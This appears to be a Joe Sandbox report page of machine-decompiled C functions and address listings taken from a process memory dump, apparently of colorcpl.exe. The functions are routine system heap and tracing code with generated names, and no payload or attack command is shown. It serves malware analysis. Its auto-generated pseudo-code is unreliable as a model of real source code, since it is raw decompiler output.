                                                                                                0x06e42aa8
                                                                                                0x06e42aab
                                                                                                0x06e85cab
                                                                                                0x06e85caf
                                                                                                0x06e85cc5
                                                                                                0x06e85cda
                                                                                                0x06e85cdc
                                                                                                0x06e85cdf
                                                                                                0x06e85ce5
                                                                                                0x00000000
                                                                                                0x06e85ceb
                                                                                                0x06e85ced
                                                                                                0x06e85cee
                                                                                                0x00000000
                                                                                                0x06e85cee
                                                                                                0x06e85cb1
                                                                                                0x06e85cb4
                                                                                                0x06e85cb9
                                                                                                0x06e85cbb
                                                                                                0x00000000
                                                                                                0x06e85cbd
                                                                                                0x06e85cbd
                                                                                                0x00000000
                                                                                                0x06e85cbd
                                                                                                0x06e85cbb
                                                                                                0x06e42ab1
                                                                                                0x06e42ab1
                                                                                                0x06e42ac4
                                                                                                0x06e42ac6
                                                                                                0x06e42ac6
                                                                                                0x00000000
                                                                                                0x06e42ac6
                                                                                                0x06e42aab
                                                                                                0x00000000
                                                                                                0x06e42a00
                                                                                                0x06e42a09
                                                                                                0x06e42a0e
                                                                                                0x06e42a21
                                                                                                0x06e42a24
                                                                                                0x06e42a35
                                                                                                0x06e42a3a
                                                                                                0x06e42a3d
                                                                                                0x06e42a42
                                                                                                0x06e42a59
                                                                                                0x06e42a59
                                                                                                0x06e42a5c
                                                                                                0x06e42a5f
                                                                                                0x06e42a5f
                                                                                                0x06e429fa
                                                                                                0x06e429f3
                                                                                                0x06e42a64
                                                                                                0x06e42a64
                                                                                                0x06e42a6b
                                                                                                0x06e42a6b
                                                                                                0x06e42a6d
                                                                                                0x06e42a72
                                                                                                0x00000000

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 31d104d7c2e7a3e03ac3bf377c9dd7f028197ecad52dba1f3fd57b92b61e9706
                                                                                                • Instruction ID: 23b2a045acb13dcf41276a58660f13c44e3d3469289951e5e21672bf64056b0c
                                                                                                • Opcode Fuzzy Hash: 31d104d7c2e7a3e03ac3bf377c9dd7f028197ecad52dba1f3fd57b92b61e9706
                                                                                                • Instruction Fuzzy Hash: 02516771A00319DFDFA5EF65D880ADEBBB6BF48314F059055FA18AB250C7318A52DF90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E44D3B Relevance: .1, Instructions: 131COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 78%
                                                                                                			E06E44D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x6f0d360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E06E5FA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x6f07bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E06E5B0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L06E34620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E06E1CCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E06E5B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E06E5F380(_t67 + 0xc, 0x6df5138, 0x10) == 0) {
								 *0x6f060d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E06E44F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E06E44E70(0x6f086b0, 0x6e45690, 0, 0) != 0) {
					_t46 = E06E1CCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}




















                                                                                                0x06e44d3b
                                                                                                0x06e44d4d
                                                                                                0x06e44d53
                                                                                                0x06e44d58
                                                                                                0x06e44d65
                                                                                                0x06e44d6c
                                                                                                0x06e44d71
                                                                                                0x06e44d77
                                                                                                0x06e44d7f
                                                                                                0x06e44d8c
                                                                                                0x06e44d8e
                                                                                                0x06e44dad
                                                                                                0x06e44db0
                                                                                                0x06e44db7
                                                                                                0x06e44db8
                                                                                                0x06e44db9
                                                                                                0x06e44dba
                                                                                                0x06e44dbb
                                                                                                0x06e44dc1
                                                                                                0x06e44dc8
                                                                                                0x06e44dcc
                                                                                                0x06e44dd5
                                                                                                0x06e44dde
                                                                                                0x06e44ddf
                                                                                                0x06e44de0
                                                                                                0x06e44de1
                                                                                                0x06e44de6
                                                                                                0x06e44de7
                                                                                                0x06e44de9
                                                                                                0x06e44df3
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e86c7c
                                                                                                0x06e86c8a
                                                                                                0x06e86c8a
                                                                                                0x06e86c9d
                                                                                                0x06e86ca7
                                                                                                0x06e86cac
                                                                                                0x06e86cb2
                                                                                                0x06e86cb9
                                                                                                0x00000000
                                                                                                0x06e86cbf
                                                                                                0x06e86cbf
                                                                                                0x00000000
                                                                                                0x06e86cbf
                                                                                                0x06e86cb9
                                                                                                0x06e44dfb
                                                                                                0x06e86ccf
                                                                                                0x06e86cd3
                                                                                                0x06e44e32
                                                                                                0x06e44e39
                                                                                                0x06e86ce0
                                                                                                0x06e86cf2
                                                                                                0x06e86cf2
                                                                                                0x06e86ce0
                                                                                                0x06e44e3f
                                                                                                0x06e44e41
                                                                                                0x06e44e51
                                                                                                0x06e44e51
                                                                                                0x06e44e03
                                                                                                0x06e44e03
                                                                                                0x06e44e09
                                                                                                0x06e44e0f
                                                                                                0x06e44e57
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e44e1b
                                                                                                0x06e44e30
                                                                                                0x06e44e5b
                                                                                                0x06e44e5b
                                                                                                0x00000000
                                                                                                0x06e44e30
                                                                                                0x06e44e11
                                                                                                0x06e44e11
                                                                                                0x06e44e16
                                                                                                0x00000000
                                                                                                0x06e44e16
                                                                                                0x06e44e01
                                                                                                0x00000000
                                                                                                0x06e44e01
                                                                                                0x06e44da5
                                                                                                0x06e86c6b
                                                                                                0x00000000
                                                                                                0x06e44dab
                                                                                                0x06e44dab
                                                                                                0x00000000
                                                                                                0x06e44dab

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e5ae6441702fb84300a279113dc1e82cbfda29c33e6752506f6b82e0c31c7ef5
                                                                                                • Instruction ID: 58f9ec28c7974dfc5c52a246dea4e737aa0fc68501564784354d99d41a3f90a9
                                                                                                • Opcode Fuzzy Hash: e5ae6441702fb84300a279113dc1e82cbfda29c33e6752506f6b82e0c31c7ef5
                                                                                                • Instruction Fuzzy Hash: 4A41C271B40318DFEBA1EF24DC80FAAB7E9EB05614F045099E9499B2C1D770ED44CB92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E44BAD Relevance: .1, Instructions: 131COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 85%
                                                                                                			E06E44BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x6f0d360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E06E1CC50(_t86);
					L11:
					return E06E5B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x6f08504
				E06E32280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E06E5FA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E06E5B0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L06E34620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E06E1CCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x6f08504
								E06E2FFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E06E44F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}


























                                                                                                0x06e44bad
                                                                                                0x06e44bbf
                                                                                                0x06e44bc2
                                                                                                0x06e44bc6
                                                                                                0x06e44bcd
                                                                                                0x06e44bd9
                                                                                                0x06e867fe
                                                                                                0x06e86800
                                                                                                0x06e44ccc
                                                                                                0x06e44ccd
                                                                                                0x06e44cb7
                                                                                                0x06e44cc9
                                                                                                0x06e44cc9
                                                                                                0x06e44bdf
                                                                                                0x06e44be5
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e44beb
                                                                                                0x06e44bef
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e44bf5
                                                                                                0x06e44bf9
                                                                                                0x06e44c06
                                                                                                0x06e44c0b
                                                                                                0x06e44c17
                                                                                                0x06e44c1c
                                                                                                0x06e44c1f
                                                                                                0x06e44c25
                                                                                                0x06e44c33
                                                                                                0x06e44c3d
                                                                                                0x06e44c40
                                                                                                0x06e44c43
                                                                                                0x06e44c47
                                                                                                0x06e44c4d
                                                                                                0x06e44c53
                                                                                                0x06e44c54
                                                                                                0x06e44c55
                                                                                                0x06e44c56
                                                                                                0x06e44c5b
                                                                                                0x06e44c5c
                                                                                                0x06e44c63
                                                                                                0x06e44c6b
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e86776
                                                                                                0x06e86784
                                                                                                0x06e86784
                                                                                                0x06e8679f
                                                                                                0x06e867a7
                                                                                                0x06e867af
                                                                                                0x06e867ce
                                                                                                0x00000000
                                                                                                0x06e867b1
                                                                                                0x06e867b7
                                                                                                0x06e867b8
                                                                                                0x06e867c1
                                                                                                0x06e867d3
                                                                                                0x06e867d9
                                                                                                0x06e867dd
                                                                                                0x06e44c94
                                                                                                0x06e44c94
                                                                                                0x06e44c98
                                                                                                0x06e44c9c
                                                                                                0x06e44ca3
                                                                                                0x06e867f4
                                                                                                0x06e867f4
                                                                                                0x06e44cb5
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e44cb5
                                                                                                0x06e44c79
                                                                                                0x06e44c7e
                                                                                                0x06e44c89
                                                                                                0x06e44c8b
                                                                                                0x06e44c8f
                                                                                                0x06e44c8f
                                                                                                0x00000000
                                                                                                0x06e44c89
                                                                                                0x06e867c3
                                                                                                0x00000000
                                                                                                0x06e867c3
                                                                                                0x06e867af
                                                                                                0x06e44c73
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 882b1999201908595a94a442843b91008c713f49702b7b7707b876c92e590655
                                                                                                • Instruction ID: 6b5ec970bd7be01bcb4d67bfcbae9c88e70da9b5a475bb1c341c3a3264602d0f
                                                                                                • Opcode Fuzzy Hash: 882b1999201908595a94a442843b91008c713f49702b7b7707b876c92e590655
                                                                                                • Instruction Fuzzy Hash: AE417D35E40328DFEBA1EF64DD40BEA77B8EF45710F0510A5E90CAB280DA759E84CB95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E28A0A Relevance: .1, Instructions: 120COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 94%
                                                                                                			E06E28A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x6f0d360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E06E5B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E06E2E9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x6df1180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E06E41DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E06E53C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E06E28999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}



























                                                                                                0x06e28a0a
                                                                                                0x06e28a1c
                                                                                                0x06e28a23
                                                                                                0x06e28a2e
                                                                                                0x06e28a30
                                                                                                0x06e28a36
                                                                                                0x06e28a3c
                                                                                                0x06e28a3e
                                                                                                0x06e28a4a
                                                                                                0x06e28a52
                                                                                                0x06e28a9c
                                                                                                0x06e28aae
                                                                                                0x06e28a58
                                                                                                0x06e28a5e
                                                                                                0x06e28a6a
                                                                                                0x06e28a6f
                                                                                                0x06e28a75
                                                                                                0x06e28a7d
                                                                                                0x06e28a85
                                                                                                0x06e28a86
                                                                                                0x06e28a89
                                                                                                0x06e28a93
                                                                                                0x06e28a99
                                                                                                0x06e28a9b
                                                                                                0x00000000
                                                                                                0x06e28aaf
                                                                                                0x06e28abe
                                                                                                0x06e28ac3
                                                                                                0x06e28acb
                                                                                                0x06e28ad7
                                                                                                0x06e28ae0
                                                                                                0x06e28af1
                                                                                                0x00000000
                                                                                                0x06e28af1
                                                                                                0x06e28acd
                                                                                                0x06e28ad5
                                                                                                0x06e28afb
                                                                                                0x06e28afd
                                                                                                0x06e28aff
                                                                                                0x06e28b07
                                                                                                0x06e28b22
                                                                                                0x06e28b24
                                                                                                0x06e28b2a
                                                                                                0x06e28b2e
                                                                                                0x06e28b3f
                                                                                                0x06e28b78
                                                                                                0x06e28b41
                                                                                                0x06e28b52
                                                                                                0x06e28b54
                                                                                                0x06e28b5c
                                                                                                0x06e28b74
                                                                                                0x06e28b74
                                                                                                0x06e28b5c
                                                                                                0x06e28b3f
                                                                                                0x06e28b5e
                                                                                                0x06e28b61
                                                                                                0x06e28b64
                                                                                                0x06e28b64
                                                                                                0x06e28b6c
                                                                                                0x06e28b6c
                                                                                                0x06e28b11
                                                                                                0x06e79cd5
                                                                                                0x06e79cd5
                                                                                                0x06e28b17
                                                                                                0x06e28b1a
                                                                                                0x06e28b1a
                                                                                                0x00000000
                                                                                                0x06e28ad5
                                                                                                0x06e28a89

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e5c609c5d902008975e197fadbd1ec1bf7819c7fa03f1405b36bf94cc2838e5d
                                                                                                • Instruction ID: 56a47f9e212a6007b4987ba536d6024df7ddd2320e4cc4c855c9e93fbbc5d366
                                                                                                • Opcode Fuzzy Hash: e5c609c5d902008975e197fadbd1ec1bf7819c7fa03f1405b36bf94cc2838e5d
                                                                                                • Instruction Fuzzy Hash: 384151B5A0033D9BDBA4DF55CC88AEAB3B9FB44304F1055EAD81997245EB709E84CF50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06EDAA16 Relevance: .1, Instructions: 120COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E06EDAA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				intOrPtr _v24;
				char* _t37;
				void* _t47;
				signed char _t51;
				void* _t53;
				char _t55;
				intOrPtr _t57;
				signed char _t61;
				intOrPtr _t75;
				void* _t76;
				signed int _t81;
				intOrPtr _t82;

				_t53 = __ecx;
				_t55 = 0;
				_v20 = _v20 & 0;
				_t75 = __edx;
				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
				_v24 = __edx;
				_v12 = 0;
				if((_t81 & 0x01000000) != 0) {
					L5:
					if(_a8 != 0) {
						_t81 = _t81 | 0x00000008;
					}
					_t57 = E06EDABF4(_t55 + _t75, _t81);
					_v8 = _t57;
					if(_t57 < _t75 || _t75 > 0x7fffffff) {
						_t76 = 0;
						_v16 = _v16 & 0;
					} else {
						_t59 = _t53;
						_t76 = E06EDAB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
							_t47 = E06EDAC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
							_t61 = _v20;
							if(_t61 != 0) {
								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
								if(E06EBCB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
									L06E377F0(_t53, 0, _t76);
									_t76 = 0;
								}
							}
						}
					}
					_t82 = _v8;
					L16:
					if(E06E37D50() == 0) {
						_t37 = 0x7ffe0380;
					} else {
						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E06ED131B(_t53, _t76, _t82, _v16);
					}
					return _t76;
				}
				_t51 =  *(__ecx + 0x20);
				_v20 = _t51;
				if(_t51 == 0) {
					goto L5;
				}
				_t81 = _t81 | 0x00000008;
				if(E06EBCB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
					_t55 = _v12;
					goto L5;
				} else {
					_t82 = 0;
					_t76 = 0;
					_v16 = _v16 & 0;
					goto L16;
				}
			}



















                                                                                                0x06edaa1f
                                                                                                0x06edaa21
                                                                                                0x06edaa23
                                                                                                0x06edaa2b
                                                                                                0x06edaa30
                                                                                                0x06edaa36
                                                                                                0x06edaa39
                                                                                                0x06edaa42
                                                                                                0x06edaa75
                                                                                                0x06edaa7a
                                                                                                0x06edaa7c
                                                                                                0x06edaa7c
                                                                                                0x06edaa88
                                                                                                0x06edaa8a
                                                                                                0x06edaa8f
                                                                                                0x06edab02
                                                                                                0x06edab04
                                                                                                0x06edaa99
                                                                                                0x06edaaa8
                                                                                                0x06edaaaf
                                                                                                0x06edaab3
                                                                                                0x06edaacc
                                                                                                0x06edaad1
                                                                                                0x06edaad6
                                                                                                0x06edaae0
                                                                                                0x06edaaf3
                                                                                                0x06edaaf9
                                                                                                0x06edaafe
                                                                                                0x06edaafe
                                                                                                0x06edaaf3
                                                                                                0x06edaad6
                                                                                                0x06edaab3
                                                                                                0x06edab07
                                                                                                0x06edab0a
                                                                                                0x06edab11
                                                                                                0x06edab23
                                                                                                0x06edab13
                                                                                                0x06edab1c
                                                                                                0x06edab1c
                                                                                                0x06edab2b
                                                                                                0x06edab44
                                                                                                0x06edab44
                                                                                                0x06edab51
                                                                                                0x06edab51
                                                                                                0x06edaa44
                                                                                                0x06edaa47
                                                                                                0x06edaa4c
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06edaa5a
                                                                                                0x06edaa64
                                                                                                0x06edaa72
                                                                                                0x00000000
                                                                                                0x06edaa66
                                                                                                0x06edaa66
                                                                                                0x06edaa68
                                                                                                0x06edaa6a
                                                                                                0x00000000
                                                                                                0x06edaa6a

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                                                                                • Instruction ID: 10d921499ae10c8a5a603b6311b95a356197a237af8050767ef45c7afcfaa63c
                                                                                                • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                                                                                • Instruction Fuzzy Hash: 7E31E032F003086BDBA58B69CC45BBFF7AAEF81214F159079E815A7295DA748E03C690
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06EDFDE2 Relevance: .1, Instructions: 116COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 76%
                                                                                                			E06EDFDE2(signed int* __ecx, signed int __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				signed int _t80;
				signed int* _t84;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t84 = __ecx;
				_t80 = E06EDFD4E(__ecx, __edx);
				_v12 = _t80;
				if(_t80 != 0) {
					_t29 =  *__ecx & _t80;
					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
						E06EE0A13(__ecx, _t80, 0, _a4);
						_t80 = 1;
						if(E06E37D50() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							E06ED1608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
						}
						goto L22;
					}
					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
						_t80 = E06EE2B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
						if(_t80 != 0) {
							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
							_t77 = _v8;
							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
								E06EDC8F7(_t66, _t77, 0);
							}
						}
					} else {
						_t80 = E06EDDBD2(__ecx[0xb], _t74, __edx, _a4);
					}
					if(E06E37D50() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(__ecx);
					_push(_t80);
					E06EDA80D(__ecx[0xf], 9, __edx, _t80);
					L22:
					return _t80;
				}
			}










                                                                                                0x06edfde7
                                                                                                0x06edfde8
                                                                                                0x06edfdec
                                                                                                0x06edfdee
                                                                                                0x06edfdf5
                                                                                                0x06edfdf7
                                                                                                0x06edfdfc
                                                                                                0x06edfe19
                                                                                                0x06edfe22
                                                                                                0x06edfe26
                                                                                                0x06edfec6
                                                                                                0x06edfecd
                                                                                                0x06edfed5
                                                                                                0x06edfee7
                                                                                                0x06edfed7
                                                                                                0x06edfee0
                                                                                                0x06edfee0
                                                                                                0x06edfeef
                                                                                                0x06edff00
                                                                                                0x06edff02
                                                                                                0x06edff07
                                                                                                0x06edff07
                                                                                                0x00000000
